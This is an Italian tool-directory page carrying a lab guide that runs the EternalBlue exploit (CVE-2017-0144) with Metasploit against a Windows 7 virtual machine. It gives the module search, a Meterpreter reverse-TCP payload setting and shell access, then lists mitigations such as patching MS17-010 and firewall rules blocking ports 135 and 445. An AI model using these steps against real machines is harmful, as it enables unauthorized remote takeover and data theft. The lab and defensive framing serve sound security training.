Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SMB-Protocol-Vulnerability_CVE-2017-0144 — Guida di laboratorio passo-passo che dimostra l'exploit EternalBlue (CVE-2017-0144) contro il protocollo SMB di Windows 7 utilizzando Metasploit, includendo configurazione, sfruttamento e fasi di mitigazione. | Kitploit
Strumenti/GitHubGitHub/luckyman2907/smb-protocol-vulnerability_cve-2017-0144
Analisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingApprendimento e FormazioneLab e Pratica
GitHubluckyman2907/smb-protocol-vulnerability_cve-2017-0144

SMB-Protocol-Vulnerability_CVE-2017-0144

Guida di laboratorio passo-passo che dimostra l'exploit EternalBlue (CVE-2017-0144) contro il protocollo SMB di Windows 7 utilizzando Metasploit, includendo configurazione, sfruttamento e fasi di mitigazione.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

LAB: ATTACCO AL SISTEMA OPERATIVO WINDOWS BASATO SULLA VULNERABILITÀ DEL PROTOCOLLO SMB.

  • 1. DESCRIZIONE
  • 2. INTRODUZIONE GENERALE
  • 3. PREPARAZIONE
  • 4. ESECUZIONE DELL'ATTACCO
  • 5. MISURE DI PREVENZIONE

1. DESCRIZIONE

In questo laboratorio useremo due computer per simulare un attacco basato sulla vulnerabilità nel protocollo SMB del sistema operativo Windows. Una macchina esegue Kali Linux, nel ruolo dell'attaccante (hacker). E un computer nel ruolo di vittima (victim). La macchina vittima esegue Windows 7 a 64 bit e contiene la vulnerabilità SMB. Per fare ciò, sulla macchina Kali Linux utilizzeremo l'exploit chiamato EternalBlue per attaccare la macchina Windows 7.

2. INTRODUZIONE GENERALE

Server Message Block (SMB) è un protocollo di condivisione file abbastanza comune sulla piattaforma Windows di Microsoft. Grazie a questo protocollo SMB, i computer Windows connessi tra loro nella stessa rete o nello stesso dominio possono condividere file. Ad oggi, SMB è anche conosciuto con il nome Common Internet File Sharing (CIFS).

EternalBlue è un exploit informatico basato sulla vulnerabilità del protocollo SMB attraverso la porta 445. Inizialmente, EternalBlue è stato sviluppato dalla National Security Agency (NSA) degli Stati Uniti. Il nome completo in inglese è U.S. National Security Agency. Ma in seguito è stato divulgato dal gruppo hacker The Shadow Brokers nel 2017. Nello stesso anno si è verificato un attacco su larga scala di virus di crittografia dei dati – Ransomware – rivolto ai computer Windows di Microsoft in tutto il mondo. Tra questi, il più famoso è stato il virus . Ad oggi, sebbene questa vulnerabilità sia stata corretta da Microsoft con l'aggiornamento di sicurezza , tuttavia nel mondo un gran numero di computer che eseguono sistemi operativi Windows hanno ancora questa vulnerabilità. Questa vulnerabilità è stata pubblicata come (Windows SMB Remote Code Execution Vulnerability). Questa vulnerabilità è estremamente pericolosa e molto facile da sfruttare. La cosa notevole è che per attaccare tramite questa vulnerabilità del protocollo SMB, l'hacker non deve inviare o indurre la vittima a scaricare o eseguire alcun virus dannoso. Cioè, la vittima, anche se non fa nulla, viene comunque facilmente attaccata dall'hacker, che prende il controllo del computer senza che lei se ne accorga.

WannaCry
MS17-010
CVE-2017-0144

3. PREPARAZIONE

Prepara 2 macchine virtuali in esecuzione su VMware Workstation:

  • Macchina virtuale Kali Linux (macchina hacker) con indirizzo IP: 192.168.198.140
  • Macchina virtuale Windows 7 (macchina vittima) con indirizzo IP: 192.168.198.143

  1. Sulla macchina virtuale Kali (attaccante):

    • Controlla l'IP: ifconfig
    • Avvia il servizio Postgresql: service postgresql start
    • Controlla se postgresql è in esecuzione con il comando: service postgresql status
  2. Sulla macchina virtuale Windows 7 (vittima):

    • Controlla l'IP: ipconfig
    • Spegni il firewall

4. ESECUZIONE DELL'ATTACCO

  • Sulla macchina Kali: Accedi a Metasploit con il comando: msfconsole

  • Una volta entrati in Metasploit, cerchiamo gli exploit e le sintassi relative a ms17_010 con il comando: search ms17_010

  • Aggiungi l'indirizzo IP della macchina vittima e della macchina attaccante
  • Imposta il payload per lo sfruttamento: use 0 -> set payload windows/x64/meterpreter/reverse_tcp

  • Esegui l'exploit per procedere allo sfruttamento
  • Apri una shell sulla macchina vittima (eseguita tramite il terminale della macchina attaccante) dopo essere entrati

=>A questo punto l'hacker è riuscito a penetrare nella macchina vittima. A questo punto, l'hacker può cancellare, rubare file dalla macchina vittima senza che essa se ne accorga. Può persino caricare ed eseguire virus direttamente su di essa.

5. MISURE DI PREVENZIONE

Per evitare di essere sfruttati e per proteggere il protocollo SMB, dobbiamo eseguire alcune operazioni:

  • Attivare il firewall.
  • Aggiornare Windows all'ultima versione. Oppure scaricare e installare le patch di sicurezza di Microsoft, specialmente la patch di sicurezza ms17_010.
  • Bloccare le porte 135 e 445.
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"
Scarica lo strumento